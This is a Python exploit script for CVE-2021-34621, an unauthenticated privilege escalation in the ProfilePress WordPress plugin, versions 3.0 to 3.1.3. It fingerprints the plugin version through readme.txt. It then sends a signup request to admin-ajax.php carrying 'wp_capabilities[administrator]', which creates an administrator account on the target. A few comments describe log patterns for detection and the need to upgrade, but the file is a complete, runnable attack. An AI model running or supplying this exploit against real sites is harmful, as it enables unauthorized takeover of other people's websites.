import argparse
import re
import requests
import os
#
# Exploit script by @RandomRobbieBF
#
# Proxy URL exported for both schemes; empty by default. The assignment
# overwrites any HTTP_PROXY / HTTPS_PROXY value already present in the
# process environment.
http_proxy = ""
os.environ.update({'HTTP_PROXY': http_proxy, 'HTTPS_PROXY': http_proxy})

# Silence urllib3's InsecureRequestWarning. This only hides the warning: the
# requests in this file pass verify=False, so server certificates are not
# validated and responses are unauthenticated.
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

# Browser-like User-Agent sent with every request made by this script.
headers = dict([
    ('User-Agent', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3'),
])
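def extract_stable_tag(wp_url):
    """Return the plugin's ``Stable tag`` version string, or None.

    Fetches ``/wp-content/plugins/wp-user-avatar/readme.txt`` below *wp_url*
    and reads the ``Stable tag:`` header from it.

    Args:
        wp_url: Base URL of the WordPress site; a trailing slash is tolerated.

    Returns:
        The version as an ``X.Y.Z`` string, or None when the readme is not
        served with HTTP 200 or carries no three-part stable tag.

    Raises:
        requests.exceptions.RequestException: on connection failure or when
            the request times out.
    """
    # Strip a trailing slash so the joined URL has no '//' in its path.
    readme_url = wp_url.rstrip('/') + '/wp-content/plugins/wp-user-avatar/readme.txt'

    # verify=False skips certificate validation, so the readme text is
    # unauthenticated. The timeout keeps an unresponsive host from blocking
    # the call indefinitely (requests has no default timeout).
    response = requests.get(readme_url, verify=False, headers=headers, timeout=15)
    if response.status_code != 200:
        return None

    stable_tag_match = re.search(r'Stable tag:\s*(\d+\.\d+\.\d+)', response.text)

    # NOTE: None means "version could not be read", not "plugin absent or
    # patched" -- readme.txt may be removed or blocked by server hardening,
    # and the tag is self-declared text rather than proof of the running code.
    return stable_tag_match.group(1) if stable_tag_match else None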
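def _version_tuple(version):
    """Convert a dotted version string such as '3.1.3' into a tuple of ints."""
    return tuple(int(part) for part in version.split('.'))


def main():
    """Command-line entry point for the CVE-2021-34621 check and request.

    Parses ``--url``, ``--username``, ``--email`` and ``--password``, reads the
    plugin version via ``extract_stable_tag`` and, only when that version lies
    in the affected range 3.0 - 3.1.3, sends the registration request and
    prints the response body (or the HTTP status on a non-200 reply).
    """
    parser = argparse.ArgumentParser(description='CVE-2021-34621 - ProfilePress 3.0 - 3.1.3 - Unauthenticated Privilege Escalation')
    parser.add_argument('--url', required=True, help='WordPress URL')
    parser.add_argument('--username', required=True, help='Username')
    parser.add_argument('--email', required=True, help='Email')
    parser.add_argument('--password', required=True, help='Password')
    args = parser.parse_args()

    stable_tag = extract_stable_tag(args.url)
    if stable_tag is None:
        # Distinguish "unknown" from "out of range": a missing or blocked
        # readme.txt says nothing about which version is installed.
        print('Could not determine the plugin version from readme.txt')
        return

    # Compare numerically. As plain strings, a tag such as '3.1.10' sorts
    # before '3.1.3' and would be treated as inside the affected range.
    if not ((3, 0) <= _version_tuple(stable_tag) <= (3, 1, 3)):
        print('Stable tag is not within the specified range (3.0 - 3.1.3)')
        return

    # Detection / mitigation note: the request below is the shape to look for
    # in web-server and WAF logs -- a POST to /wp-admin/admin-ajax.php with
    # action=pp_ajax_signup that carries a wp_capabilities[...] field.
    # Registration input must never be able to set wp_capabilities; affected
    # sites need a plugin release later than 3.1.3 and a review of the
    # administrator accounts that exist on them.
    payload = {
        'reg_username': args.username,
        'reg_email': args.email,
        'reg_password': args.password,
        'reg_password_present': 'true',
        'reg_first_name': 'test',
        'reg_last_name': 'test',
        'wp_capabilities[administrator]': '1',
        'action': 'pp_ajax_signup',
        'melange_id': ''
    }

    # The timeout keeps an unresponsive host from blocking the call forever.
    response = requests.post(args.url + '/wp-admin/admin-ajax.php', data=payload, verify=False, headers=headers, timeout=15)
    if response.status_code == 200:
        print(response.text)
    else:
        print('Error:', response.status_code)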
# Run the command-line interface only when this file is executed as a
# script; importing it as a module has no such effect.
if __name__ == "__main__":
    main()